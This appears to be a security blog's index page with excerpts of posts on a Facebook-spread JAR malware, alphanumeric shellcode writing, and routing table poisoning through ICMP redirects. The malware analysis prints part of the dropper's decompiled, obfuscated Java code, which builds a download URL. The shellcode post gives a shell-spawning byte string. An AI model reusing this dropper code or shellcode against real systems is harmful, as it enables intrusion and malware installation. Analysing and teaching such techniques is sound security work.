Skip to main content

Posts

Showing posts from 2014

Bitcoin Facebook Virus Complete Analysis

As discussed in previous post now we will employ traditional malware analysis technique in order to dissect this new virus. Figure 2 show LOL zip virus message. Initially we have following information about this malware: ·This message is sent from victim’s computer without his knowledge to all his Facebook friends and ·Victims also reported sluggish performance of system after the infection.


Fig. 2. Facebook Message containing Malware
We will safely download this file on our virtual controlled environment to carry the further analysis. After unzipping it we found a JAR (Java Archived File) in it.

Fig. 3. JAR file inside Zipped folder
 Using online available java decompiler we have converted the byte code (JAR file) to source code file.

Fig. 4. Decompiled Jar File Decompilation and comprehension of JAR File Source of JAR file is obfuscated so it is needed to decompile such a file. We will use simple print instruction to find out the meaning of all the functions. After analyzing each functi…

Malware Analysis of Malicious Facebook Message

If recently  you have received a message like the one shown below, lol and zip attached with it then please do not try to open the jar file inside it.



So what this jar file contains??
Its a code that downloads the dynamic loadable library from internet and install it in system.Lets have a look at the source code of jar file which i decompiled .


import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintStream;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Paths;

public class IMG_00111
{
  public static String XJJXMWJJQDBIAEHVEBZ()
  {
    int[] arrayOfInt = { 104, 116, 116, 112, 115, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47 };

    StringBuilder localStringBuilder = new StringBuilder(arrayOfInt.length);
    for (int i = 0; i < arrayOfInt.length; i+…

Alphanumeric Shellcode

Writing Alphanumeric Shellcode
Step1: First we will write assembly program to spawn a shell:


SHELLCODE "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

Step2: Now lets test this hex shellcode using a C program:



Step3: Convert instruction opcodes from hex to ascii using table given below:
ASCII Shellcode TableASCII ValueHex OpcodeAssembly Equivalent0\x30xor1\x31xor2\x32xor3\x33xor4\x34xor al, 0x## [byte]5\x35xor eax, 0x######## [DWORD]6\x36SS Segment Override7\x37aaa8\x38cmp9\x39cmp :\x3acmp ;\x3bcmp<\x3ccmp al, 0x## [byte]=\x3dcmp eax, 0x######## [DWORD]>\x3e[undocced nop] ?\x3faas@\x40inc eaxA\x41inc ecxB\x42inc edxC\x43inc ebxD\x44inc espE\x45inc ebpF\x46inc esiG\x47inc ediH\x48dec eaxI\x49dec ecxJ\x4a

Routing Table Poisoning

Well you have heard of arp poisoning and dns cache poisoning,this attack is quite similar but require alot of knowledge to perform it correctly. So what we will do, we use icmp redirect host packet to add a fake routing entry in victim machine to do MITM(Man In The Middle) or DOS(Denial Of service) or DNS Poisoning.Yes that's the beauty, all three can be done using this attack. Redirect requests data packets be sent on an alternative route. ICMP Redirect is a mechanism for routers to convey routing information to hosts. The message informs a host to update its routing information (to send packets on an alternative route). If a host tries to send data through a router (R1) and R1 sends the data on another router (R2) and a direct path from the host to R2 is available (that is, the host and R2 are on the same Ethernet segment), then R1 will send a redirect message to inform the host that the best route for the destination is via R2. The host should then send packets for the destina…